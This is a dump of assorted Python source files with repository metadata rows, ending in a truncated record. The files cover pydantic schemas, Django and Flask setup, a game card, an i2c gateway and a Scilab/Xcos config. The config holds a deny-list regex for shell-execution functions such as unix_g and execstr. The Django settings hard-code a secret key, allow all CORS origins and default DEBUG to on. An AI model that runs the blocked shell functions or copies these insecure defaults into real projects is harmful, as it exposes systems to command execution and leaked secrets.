| 35.529412 | 105 | 0.621689 | 152 | 1,208 | 4.815789 | 0.460526 | 0.07377 | 0.061475 | 0.077869 | 0.213115 | 0.168033 | 0.168033 | 0.122951 | 0.122951 | 0 | 0 | 0.001131 | 0.268212 | 1,208 | 33 | 106 | 36.606061 | 0.826923 | 0.051325 | 0 | 0 | 0 | 0 | 0.156965 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.117647 | null | null | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbaed78c0a3771fe8d6877498d4f427ba1525026 | 665 | py | Python | app/schemas/entities/user.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | null | null | null | app/schemas/entities/user.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | null | null | null | app/schemas/entities/user.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | null | null | null | from datetime import datetime
from pydantic import (
BaseModel,
EmailStr
)
from ..base import (
IDModelMixin,
ModelWithOrmMode
)
__all__ = [
'UserInCreate',
'UserInLogin',
'UserInUpdate',
'UserInResponse'
]
class UserInCreate(BaseModel):
email: EmailStr
password: str
class UserInLogin(UserInCreate):
pass
class UserInUpdate(BaseModel):
email: EmailStr | None
password: str | None
class UserInResponse(IDModelMixin, ModelWithOrmMode):
email: EmailStr
email_confirmation_token: str
is_active: bool
is_email_confirmed: bool
is_superuser: bool
email_confirmed_at: datetime | None
| 15.465116 | 53 | 0.702256 | 64 | 665 | 7.109375 | 0.4375 | 0.085714 | 0.096703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225564 | 665 | 42 | 54 | 15.833333 | 0.883495 | 0 | 0 | 0.066667 | 0 | 0 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.1 | 0 | 0.566667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bbb4219508a1092291e0cb9dc2078d91e4fdd976 | 479 | py | Python | product/urls.py | yusif763/Unistore-pro | 41ad0fa209c79a201d3f6a7aa68ec0ace707dcad | [
"MIT"
] | 3 | 2021-04-29T10:49:06.000Z | 2022-03-03T12:40:21.000Z | product/urls.py | yusif763/Unistore-pro | 41ad0fa209c79a201d3f6a7aa68ec0ace707dcad | [
"MIT"
] | null | null | null | product/urls.py | yusif763/Unistore-pro | 41ad0fa209c79a201d3f6a7aa68ec0ace707dcad | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path,include
from product.views import ProductDetailView , ProductListView
from django.conf import settings
from django.conf.urls.static import static
app_name = "product"
urlpatterns = [
path('product-list/', ProductListView.as_view() , name = 'product_list'),
path('product/<int:pk>/' , ProductDetailView.as_view(), name='product_detail'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 29.9375 | 83 | 0.768267 | 61 | 479 | 5.901639 | 0.459016 | 0.111111 | 0.077778 | 0.094444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11691 | 479 | 15 | 84 | 31.933333 | 0.851064 | 0 | 0 | 0 | 0 | 0 | 0.132353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bbb58810fe63e339d5cd6293988a21ee96b008f3 | 1,792 | py | Python | idfy_rest_client/models/jwt_validation_request.py | dealflowteam/Idfy | fa3918a6c54ea0eedb9146578645b7eb1755b642 | [
"MIT"
] | null | null | null | idfy_rest_client/models/jwt_validation_request.py | dealflowteam/Idfy | fa3918a6c54ea0eedb9146578645b7eb1755b642 | [
"MIT"
] | null | null | null | idfy_rest_client/models/jwt_validation_request.py | dealflowteam/Idfy | fa3918a6c54ea0eedb9146578645b7eb1755b642 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
idfy_rest_client.models.jwt_validation_request
This file was automatically generated for Idfy by APIMATIC v2.0 ( https://apimatic.io )
"""
class JwtValidationRequest(object):
"""Implementation of the 'JwtValidationRequest' model.
Jwt validation request
Attributes:
jwt (string): The JWT to be validated as an string
"""
# Create a mapping from Model property names to API property names
_names = {
"jwt":'jwt'
}
def __init__(self,
jwt=None,
additional_properties = {}):
"""Constructor for the JwtValidationRequest class"""
# Initialize members of the class
self.jwt = jwt
# Add additional model properties to the instance
self.additional_properties = additional_properties
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
jwt = dictionary.get('jwt')
# Clean out expected properties from dictionary
for key in cls._names.values():
if key in dictionary:
del dictionary[key]
# Return an object of this model
return cls(jwt,
dictionary)
| 26.352941 | 92 | 0.586496 | 188 | 1,792 | 5.515957 | 0.446809 | 0.019286 | 0.038573 | 0.030858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00258 | 0.351004 | 1,792 | 67 | 93 | 26.746269 | 0.88908 | 0.517857 | 0 | 0 | 1 | 0 | 0.013196 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbb956f3dcc1f38ad80f492ee67e82aaf87516fe | 1,443 | py | Python | designer/keyboard.py | designer-edu/designer | 9c5d004e934300a30fb6d3148f4db313b69057df | [
"MIT"
] | 3 | 2022-01-21T00:08:02.000Z | 2022-03-09T19:00:26.000Z | designer/keyboard.py | krishols/designer | 8f80b3309802d16d8577280274e0c9fa02db306b | [
"MIT"
] | 24 | 2021-08-13T17:09:15.000Z | 2022-01-05T16:12:09.000Z | designer/keyboard.py | designer-edu/designer | 9c5d004e934300a30fb6d3148f4db313b69057df | [
"MIT"
] | null | null | null | """The keyboard modules provides an interface to adjust the keyboard's repeat
rate.
.. attribute:: repeat
When the keyboard repeat is enabled, keys that are held down will keep
generating new events over time. Defaults to `False`.
.. attribute:: delay
`int` to control how many milliseconds before the repeats start.
.. attribute:: interval
`int` to control how many milliseconds to wait between repeated events.
"""
import pygame
class KeyboardModule:
DEFAULT_DELAY = 600
DEFAULT_REPEAT = False
DEFAULT_INTERVAL = 100
def __init__(self):
self._repeat = False
self._delay = 600
self._interval = 100
def _update_repeat_status(self):
if self._repeat:
pygame.key.set_repeat(self._delay, self._interval)
else:
pygame.key.set_repeat()
@property
def repeat(self):
return self._repeat
@repeat.setter
def repeat(self, value):
self._repeat = value
self._update_repeat_status()
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, value):
self._interval = value
self._update_repeat_status()
@property
def delay(self):
return self._delay
@delay.setter
def delay(self, value):
self._delay = value
if value == 0:
self._repeat = False
self._update_repeat_status()
| 21.863636 | 77 | 0.643798 | 173 | 1,443 | 5.17341 | 0.364162 | 0.055866 | 0.080447 | 0.073743 | 0.15419 | 0.15419 | 0.084916 | 0 | 0 | 0 | 0 | 0.012464 | 0.2772 | 1,443 | 65 | 78 | 22.2 | 0.845638 | 0.298683 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0 | 0.027027 | 0.081081 | 0.432432 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbc4643c50605cf9ee6bd53e30b5c017250f35fb | 378 | py | Python | src/Dominion/Actioncards/Vassal.py | CarlGathmann/Dominion | dc30a6db5f005d1148c5ddb4346a8d2b4397001c | [
"MIT"
] | null | null | null | src/Dominion/Actioncards/Vassal.py | CarlGathmann/Dominion | dc30a6db5f005d1148c5ddb4346a8d2b4397001c | [
"MIT"
] | null | null | null | src/Dominion/Actioncards/Vassal.py | CarlGathmann/Dominion | dc30a6db5f005d1148c5ddb4346a8d2b4397001c | [
"MIT"
] | null | null | null | from src.Dominion.Cardtypes.Actioncard import Actioncard
class Vassal(Actioncard):
EXPENCES = 3
CARDS = 0
ACTIONS = 0
BUYS = 0
MONEY = 2
def specialAction(self, player, game):
card = player.drawAndReturn()
if isinstance(card, Actioncard):
print("playing", card, "with Vassal")
player.playActioncard(card, game)
| 23.625 | 56 | 0.62963 | 41 | 378 | 5.804878 | 0.707317 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018248 | 0.275132 | 378 | 15 | 57 | 25.2 | 0.850365 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.666667 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bbc5bb679186b23bb3fc2ab00d1dedb29209a03c | 4,107 | py | Python | config.py | gzq763199198/xcos_on_cloud | 63ce264e79f03151e0f414abc3953b9d7d84a388 | [
"MIT"
] | 1 | 2019-02-15T03:10:46.000Z | 2019-02-15T03:10:46.000Z | config.py | gzq763199198/xcos_on_cloud | 63ce264e79f03151e0f414abc3953b9d7d84a388 | [
"MIT"
] | null | null | null | config.py | gzq763199198/xcos_on_cloud | 63ce264e79f03151e0f414abc3953b9d7d84a388 | [
"MIT"
] | null | null | null | # The location of the extracted scilab_for_xcos_on_cloud. This can be either
# relative to SendLog.py or an absolute path.
SCILAB_DIR = '../scilab_for_xcos_on_cloud'
# The location to keep the flask session data on server.
FLASKSESSIONDIR = '/tmp/flask-sessiondir'
# The location to keep the session data on server.
SESSIONDIR = '/tmp/sessiondir'
# The location of the xcos files on server.
XCOSSOURCEDIR = ''
# the http server settings
HTTP_SERVER_HOST = '127.0.0.1'
HTTP_SERVER_PORT = 8001
# the database server settings
DB_HOST = '127.0.0.1'
DB_USER = 'scilab'
DB_PASS = ''
DB_NAME = 'scilab'
DB_PORT = 3306
# the database queries
QUERY_CATEGORY = (
"SELECT DISTINCT(loc.id), loc.category_name "
"FROM textbook_companion_preference pe "
"JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
"JOIN list_of_category loc ON pe.category = loc.id "
"JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
"JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
"JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
"JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
"WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
"pe.approval_status = 1 "
"ORDER BY loc.id ASC")
QUERY_BOOK = (
"SELECT DISTINCT(pe.id), pe.book, pe.author "
"FROM textbook_companion_preference pe "
"JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
"JOIN list_of_category loc ON pe.category = loc.id "
"JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
"JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
"JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
"JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
"WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
"pe.approval_status = 1 AND pe.category = %s "
"ORDER BY pe.book ASC")
QUERY_CHAPTER = (
"SELECT DISTINCT(tcc.id), tcc.number, tcc.name "
"FROM textbook_companion_preference pe "
"JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
"JOIN list_of_category loc ON pe.category = loc.id "
"JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
"JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
"JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
"JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
"WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
"pe.approval_status = 1 AND tcc.preference_id = %s "
"ORDER BY tcc.number ASC")
QUERY_EXAMPLE = (
"SELECT DISTINCT(tce.id), tce.number, tce.caption "
"FROM textbook_companion_preference pe "
"JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
"JOIN list_of_category loc ON pe.category = loc.id "
"JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
"JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
"JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
"JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
"WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
"pe.approval_status = 1 AND tce.chapter_id = %s "
"ORDER BY tce.number")
QUERY_EXAMPLE_FILE = (
"SELECT id as example_file_id, filename "
"FROM textbook_companion_example_files "
"WHERE filetype = 'X' AND example_id = %s"
)
QUERY_EXAMPLE_FILE_BY_ID = (
"SELECT filename, filepath, example_id "
"FROM textbook_companion_example_files "
"WHERE filetype = 'X' AND id = %s"
)
QUERY_PREREQUISITE_FILE_BY_EXAMPLE_ID = (
"SELECT filename, filepath, id as prerequisite_file_id "
"FROM textbook_companion_example_files "
"WHERE filetype = 'S' AND example_id = %s"
)
# Following are system command which are not permitted in sci files
# (Reference scilab-on-cloud project)
SYSTEM_COMMANDS = (
r'unix\(.*\)|unix_g\(.*\)|unix_w\(.*\)|unix_x\(.*\)|unix_s\(.*\)|host'
r'|newfun|execstr|ascii|mputl|dir\(\)'
)
REMOVEFILE = True
| 38.383178 | 77 | 0.720477 | 629 | 4,107 | 4.461049 | 0.176471 | 0.139344 | 0.119743 | 0.098361 | 0.639701 | 0.604063 | 0.604063 | 0.604063 | 0.586244 | 0.550606 | 0 | 0.008323 | 0.180911 | 4,107 | 106 | 78 | 38.745283 | 0.825803 | 0.107378 | 0 | 0.443038 | 0 | 0 | 0.777565 | 0.24788 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.012658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbc8e062ddb6e77238b67ff0bb071c38b56c6ab0 | 1,450 | py | Python | electronics/gateways/linuxdevice.py | MartijnBraam/pyElectronics | a20878c9fa190135f1e478e9ea0b54ca43ff308e | [
"MIT"
] | 77 | 2016-02-22T21:14:02.000Z | 2022-03-18T14:28:35.000Z | electronics/gateways/linuxdevice.py | MartijnBraam/pyElectronics | a20878c9fa190135f1e478e9ea0b54ca43ff308e | [
"MIT"
] | 8 | 2016-02-23T22:21:42.000Z | 2019-03-02T23:46:46.000Z | electronics/gateways/linuxdevice.py | MartijnBraam/pyElectronics | a20878c9fa190135f1e478e9ea0b54ca43ff308e | [
"MIT"
] | 9 | 2016-02-23T22:06:34.000Z | 2022-03-18T14:28:41.000Z | import smbus
import struct
class LinuxDevice(object):
"""
Class for using a i2c master that is supported by a Linux kernel module. An example is the internal smbus in a
computer motherboard (supported by i2c-dev) or the i2c connection on the Raspberry Pi (supported by i2c-bcm2708).
Linux gives every i2c bus a number. For the Raspberry Pi 2 this is "1"
:example:
>>> from electronics.gateways import LinuxDevice
>>> # Open /dev/i2c-1
>>> gw = LinuxDevice(1) # doctest: +SKIP
:param i2c_bus_index: The number of the i2c bus.
"""
def __init__(self, i2c_bus_index):
self.i2c_index = i2c_bus_index
self.bus = smbus.SMBus(i2c_bus_index)
def i2c_write_register(self, address, register, data):
if isinstance(data, int):
data = [data]
for b in data:
self.bus.write_byte_data(address, register, b)
def i2c_read_register(self, address, register, length):
result = b""
for r in range(register, register + length):
value = self.bus.read_byte_data(address, r)
# smbus module uses struct.unpack('@b') but almost nothing is a signed byte with native ordening...
temp = struct.pack('@b', value)
result += temp
return result
def i2c_read(self, address, length):
raise NotImplementedError()
def i2c_write(self, address, data):
raise NotImplementedError() | 34.52381 | 117 | 0.648276 | 198 | 1,450 | 4.631313 | 0.409091 | 0.039258 | 0.047983 | 0.032715 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02243 | 0.262069 | 1,450 | 42 | 118 | 34.52381 | 0.834579 | 0.391034 | 0 | 0.090909 | 0 | 0 | 0.002381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.227273 | false | 0 | 0.090909 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbcbfbd1d58ce2b647da49b8c46ee6e1affed712 | 292 | py | Python | tests/func/conftest.py | madtibo/temboard-agent | c63b82e243c9155e1878ba94e747b51761d62138 | [
"PostgreSQL"
] | null | null | null | tests/func/conftest.py | madtibo/temboard-agent | c63b82e243c9155e1878ba94e747b51761d62138 | [
"PostgreSQL"
] | null | null | null | tests/func/conftest.py | madtibo/temboard-agent | c63b82e243c9155e1878ba94e747b51761d62138 | [
"PostgreSQL"
] | null | null | null | import pytest
from test.temboard import build_env_dict, drop_env, init_env
ENV = {}
@pytest.fixture(autouse=True, scope='session')
def env():
env = build_env_dict()
drop_env(env)
init_env(env)
ENV.update(env)
try:
yield ENV
finally:
drop_env(env)
| 15.368421 | 60 | 0.64726 | 42 | 292 | 4.285714 | 0.47619 | 0.2 | 0.133333 | 0.177778 | 0.211111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243151 | 292 | 18 | 61 | 16.222222 | 0.81448 | 0 | 0 | 0.153846 | 0 | 0 | 0.023973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbdf54f606318a7ccaabefa4c50ba61c3c9c2f2d | 866 | py | Python | LAB02/CloudAlbum/run.py | michaelrishiforrester/moving-to-serverless-workshop-1d | 5af925b00b5b7dfe7861b090343ced54676cffc3 | [
"MIT"
] | 7 | 2019-03-12T00:58:36.000Z | 2019-08-21T04:13:27.000Z | LAB02/CloudAlbum/run.py | aws-kr-tnc/moving-to-serverless-workshop-1d | 5af925b00b5b7dfe7861b090343ced54676cffc3 | [
"MIT"
] | 30 | 2019-12-26T17:30:42.000Z | 2022-03-21T22:17:48.000Z | LAB02/CloudAlbum/run.py | michaelrishiforrester/moving-to-serverless-workshop-1d | 5af925b00b5b7dfe7861b090343ced54676cffc3 | [
"MIT"
] | 7 | 2019-05-27T01:53:29.000Z | 2020-02-26T18:42:29.000Z | from flask import Flask, session
from flask_session import Session
from cloudalbum import application as CloudAlbum
from cloudalbum.config import conf
from cloudalbum import util
from redis import StrictRedis
import os, socket
app = Flask(__name__)
# Flask Session for Redis
#app.config['SESSION_TYPE'] = 'redis'
#app.config['SESSION_REDIS'] = StrictRedis(host='<ELASTICACHE_ENDPOINT>', port=<PORT>)
#Session(app)
# This code is inserted for only LAB02.
@app.template_filter()
def get_ip_addr(value):
hostname = '({0})'.format(socket.gethostname())
return hostname
if __name__ == '__main__':
util.check_variables()
app = CloudAlbum.init_app(app)
app.logger.debug('DB_URL: {0}'.format(conf['DB_URL']))
app.logger.debug('GMAPS_KEY: {0}'.format(conf['GMAPS_KEY']))
app.run(host=conf['APP_HOST'], port=conf['APP_PORT'], debug=True)
| 25.470588 | 86 | 0.729792 | 121 | 866 | 5 | 0.438017 | 0.059504 | 0.066116 | 0.069421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006658 | 0.132794 | 866 | 33 | 87 | 26.242424 | 0.798935 | 0.224018 | 0 | 0 | 0 | 0 | 0.103916 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.388889 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bbdf5cf8f8fae95f6eaee3ec6200af3cab9a6613 | 6,061 | py | Python | aprepi/settings.py | MikaelSantilio/aprepi-django | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | [
"MIT"
] | null | null | null | aprepi/settings.py | MikaelSantilio/aprepi-django | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | [
"MIT"
] | 9 | 2021-01-13T22:06:29.000Z | 2021-06-16T10:33:48.000Z | aprepi/settings.py | MikaelSantilio/aprepi-django | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | [
"MIT"
] | 1 | 2021-02-05T18:12:15.000Z | 2021-02-05T18:12:15.000Z | from pathlib import Path
from datetime import timedelta
import os
import environ
env = environ.Env()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+t#_3i@_h(7lj=_4(s9^igwu*y&&87izjoo$xw7ji_a66!#ri1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = eval(os.getenv('DEBUG', default='True'))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# Third-party APPs
'django_extensions',
'widget_tweaks',
"rest_framework",
'corsheaders',
# "rest_framework.authtoken",
"django_filters",
"drf_yasg",
# Project APPs
'users',
'donations',
'core',
'events',
'member',
]
MIDDLEWARE = [
"whitenoise.middleware.WhiteNoiseMiddleware",
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'aprepi.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(BASE_DIR / "templates")],
'OPTIONS': {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
"loaders": [
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'aprepi.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(BASE_DIR / "staticfiles")
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = "/static/"
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [str(BASE_DIR / "static")]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(BASE_DIR / "media")
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = "/media/"
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "core:dashboard"
LOGOUT_REDIRECT_URL = "core:home"
LOGIN_URL = "users:login"
LOGOUT_URL = "users:logout"
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
TOKEN_MERCADO_PAGO = str(os.getenv('TOKEN_MERCADO_PAGO', default='AKJSJ1J2O10332BJ2KBKDA'))
# django-rest-framework
# -------------------------------------------------------------------------------
# django-rest-framework - https://www.django-rest-framework.org/api-guide/settings/
REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": (
# "rest_framework.authentication.SessionAuthentication",
# "rest_framework.authentication.TokenAuthentication",
"rest_framework_simplejwt.authentication.JWTAuthentication",
),
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
"PAGE_SIZE": 5,
"DEFAULT_SCHEMA_CLASS": "rest_framework.schemas.coreapi.AutoSchema",
"DEFAULT_PERMISSION_CLASSES": ("rest_framework.permissions.IsAuthenticated",),
"DEFAULT_FILTER_BACKENDS": ["django_filters.rest_framework.DjangoFilterBackend"],
"DEFAULT_THROTTLE_CLASSES": [
"rest_framework.throttling.AnonRateThrottle",
"rest_framework.throttling.UserRateThrottle"
],
"DEFAULT_THROTTLE_RATES": {
"anon": "50/day",
"user": "500/day"
}
}
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=60),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'AUTH_HEADER_TYPES': ('JWT',),
'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
}
CORS_ORIGIN_ALLOW_ALL = True
| 30.457286 | 93 | 0.677446 | 617 | 6,061 | 6.484603 | 0.387358 | 0.061735 | 0.065984 | 0.074981 | 0.170957 | 0.170957 | 0.131967 | 0.109223 | 0.097476 | 0.053987 | 0 | 0.008372 | 0.152615 | 6,061 | 198 | 94 | 30.611111 | 0.770639 | 0.274212 | 0 | 0.02381 | 0 | 0.007937 | 0.557851 | 0.447199 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.039683 | 0.031746 | 0 | 0.031746 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbdfab240b21c157c3ec03cf2f8676f1335dc24e | 1,284 | py | Python | Chapter05/mnist.py | PacktPublishing/Hands-On-Deep-Learning-for-Images-with-TensorFlow | 1ced05560a4fc8b444e8524b0c896d5aa00e2fc7 | [
"MIT"
] | 16 | 2018-08-14T06:26:05.000Z | 2021-10-04T06:36:57.000Z | Chapter05/mnist.py | PacktPublishing/Hands-On-Deep-Learning-for-Images-with-TensorFlow | 1ced05560a4fc8b444e8524b0c896d5aa00e2fc7 | [
"MIT"
